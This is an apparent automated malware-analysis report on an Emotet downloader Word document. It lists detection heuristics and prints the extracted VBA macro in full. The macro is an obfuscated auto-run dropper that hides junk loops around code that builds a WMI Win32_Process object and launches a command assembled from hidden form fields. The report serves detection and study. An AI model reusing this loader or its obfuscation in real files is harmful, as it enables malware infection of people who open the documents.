Verdict: MALICIOUS
Risk Score: 172
Heuristics: 7

- ClamAV: Doc.Downloader.Emotet-7473497-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set Gkjpnwxihmxy = GetObject(Dcnoxqwznm)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes |

SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 163 of 306 identifiers look randomly generated (e.g. 'Pyngajvzaswfh'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Ltyncvvwo = 234 + 423
Do While Cikubwvivihv = 1
Hcmhzkjwdl = 3 * Fqdsyasenoww
Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
Bnbajuowvggcm = ("Rerum ad nihil vel.")
Gingzqsy = 223
Next
Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
Ewdbqeofwfve = 234 + 423
Do While Ucwjhgwmvyh = 1
Rdkgxjky = 3 * Hscfaewhrzd
Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
Wrljfjwzrb = ("Velit saepe.")
Ndffipzh = 223
Next
Ulszawfr = Chtalegcvuz
Loop
End Sub
Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
Ecpsjpwmt = 234 + 423
Do While Iflpcowzdtqob = 1
Qlrgusoolmu = 3 * Evuphzdzzkfb
Mnnnndwy = ("Et.")
For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
Jiygysjieomg = ("Enim ut vel.")
Hhkijhrspcfz = 223
Next
Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
Xoxcfslhh = 234 + 423
Do While Pkocrnurft = 1
Kkoupcjxomswo = 3 * Llcoewtryqjb
Bqljpnrrywfxb = ("Autem.")
For Sroysigd = Cqtqegapan To Nyfcungih
Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
Upfiaghl = 223
Next
Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
Zcyuqbzhudyk = 234 + 423
Do While Wvxzhtphlfoe = 1
Ibunrqdbman = 3 * Aoxboyme
Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
Jkgqadlqc = 223
Next
Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
Lhsyghafslbi = 234 + 423
Do While Letzvixom = 1
Xdgyuyaelpj = 3 * Hgrkaaarl
Gdjeewwuxkid = ("Ea et.")
For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
Uphpromjiicnw = ("Magnam.")
Pgxecxxnq = 223
Next
Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
Yyqtlblmjar = 234 + 423
Do While Usazcqclwva = 1
Bvovtqeuu = 3 * Dwiiuaeoe
Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
Plpplkfme = ("Dicta.")
Pcryihkdhla = 223
Next
Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
Hhahpldlmgytv = 234 + 423
Do While Bdbvsqpntmg = 1
Cpsroosgidlmw = 3 * Nxrrvfnk
Iisthuiee = ("Larry")
For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
Ujcwmygukzttl = ("Ronnie")
Puyciwrsobfm = 223
Next
Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Dxztlkebm = 234 + 423
Do While Ngqkvsvdtavag = 1
Mvopoxnzbmda = 3 * Vpwvlvkkk
Xiaghwsmsyin = ("Sint hic officiis vel.")
For Bagoxrskw = Yfumibldur To Ttpkosinbao
Evmtdnmdvjry = ("Et.")
Wwjcpnmnvh = 223
Next
Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Aojplemq.Gzuokbkyuug + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
Bfmckkwihiaz = 234 + 423
Do While Aekpydhwj = 1
Qqwjgipnqlgs = 3 * Kwbemzutb
Kweanfwvktua = ("Et.")
For Zllzuuml = Ggsxryxovqw To Mdgkwomqwc
Nithghznru = ("Sed molestiae libero quam recusandae.")
Yemwfeiena = 223
Next
Nkpwwwkdpldqe = Jxztswtlscq
Loop
Dcnoxqwznm = Join(Uqdvmpngkfcs, "")
Hxaemhxqqzcle = 234 + 423
Do While Wwlxqtzpxi = 1
Chldewgncwp = 3 * Kacgyyjy
Lbiscihdwutvi = ("Ut impedit nemo eos numquam aliquam sapiente non facere et.")
For Xoxxkzhptftxi = Ipdizbvedf To Tbkprxkajman
Momjkzell = ("Consectetur illo asperiores sint.")
Zfubjusqgnnj = 223
Next
Zxyawopj = Hsuuvohpgxs
Loop
Set Gkjpnwxihmxy = GetObject(Dcnoxqwznm)
Wlyhavvsmu = 234 + 423
Do While Tpysogzamph = 1
Bwlmexbp = 3 * Rfqcymry
Hmzudygckwge = ("Celia")
For Yzkghwob = Hmxeaovrrp To Xqigryfexnr
Zckrtggu = ("Commodi ea asperiores.")
Qabbwapmxgi = 223
Next
Xafpvnotukab = Zyiqvidsfp
Loop
Rioscijwwxx = Dcnoxqwznm + Jeuwzqvsdrcqz.Lcgurlihjqe.ControlTipText + Jeuwzqvsdrcqz.Kavzasrckkfrp.ControlTipText
Ihcumvqfu = 234 + 423
Do While Bjpnoqgqqibbt = 1
Vikhgitnanug = 3 * Bvaawtxd
Hditxgfjruz = ("Qui ab illum.")
For Ngpiwpatkuno = Bwjusowa To Zqthlosd
Mthkantu = ("Vanessa")
Vejfemizgs = 223
Next
Dpigvsivbj = Ohpytevbeu
Loop
Jhotvpvvro = Rioscijwwxx + Aojplemq.Gzuokbkyuug
Dhfwqdskkhs = 234 + 423
Do While Ocwipifcilro = 1
Suybjheaymlq = 3 * Zavtdfcn
Keanuwnivlzqm = ("Eum ratione ut iure aut autem ipsa.")
For Opodjxyze = Pylppfnzr To Qfczduybi
Kpqojxblfvl = ("Suscipit eligendi hic beatae.")
Pxgvucmod = 223
Next
Ibktdadttznwz = Qyfaletvjgoch
Loop
Set Ewxdqdei = GetObject(Jhotvpvvro)
Nucgbbkfmrw = 234 + 423
Do While Zjyflsijyjq = 1
Lqajsmkphjybu = 3 * Tysbepbxrmh
Gokmzcpt = ("Autem ut necessitatibus ut possimus veniam ut.")
For Yjwarzze = Tqarpdikt To Lwkjsymcrvvnv
Ipjxsiqigqn = ("Naomi")
Vufawgmmmryam = 223
Next
Kxcfwyvtavqnv = Tefqgxqv
Loop
Ewxdqdei.XSize = False
Xmdofjmztyom = 234 + 423
Do While Wztomnceaofqu = 1
Kcwxgtpgyku = 3 * Yjpnjsiw
Wbqtlpioockjv = ("Qui rerum consequuntur.")
For Pehtvdstzfr = Gcbsrdzwqzdq To Frrpoxyunbdw
Hqouqqima = ("Aspernatur.")
Ssszeecgimci = 223
Next
Btmoapuh = Zliayntrzxv
Loop
Ewxdqdei.YSize = False
Hgdqfewunrxo = 234 + 423
Do While Pbpubepsghts = 1
Tgisphoj = 3 * Encalomdw
Vaypoeoz = ("Autem eos magni.")
For Nssahjezfggdg = Bpgsvpvbcyf To Aczkbkru
Efherdwrtibnp = ("Rudy")
Airrqcbzb = 223
Next
Gvbwytrp = Oldxgglacm
Loop
Do While Gkjpnwxihmxy.Create(KSNNSN & Ypzdgmswtvdol, Ssirbkkvy, Ewxdqdei, Xfvqhbpjicvz)
Loop
Cjevedjkn = 234 + 423
Do While Ornzcmqtw = 1
Edsdgulonr = 3 * Kxbxtdzfqylj
Pbehyigsfbcb = ("Quasi sequi veritatis perspiciatis.")
For Yyzojwdcapx = Utfsjmofkkfsv To Ravsgkgrzwzu
Bokjmmzzjt = ("Quae non ipsa distinctio reprehenderit error autem.")
Joouvoilka = 223
Next
Ilnbgvjrz = Vvjjbssrcd
Loop
End Function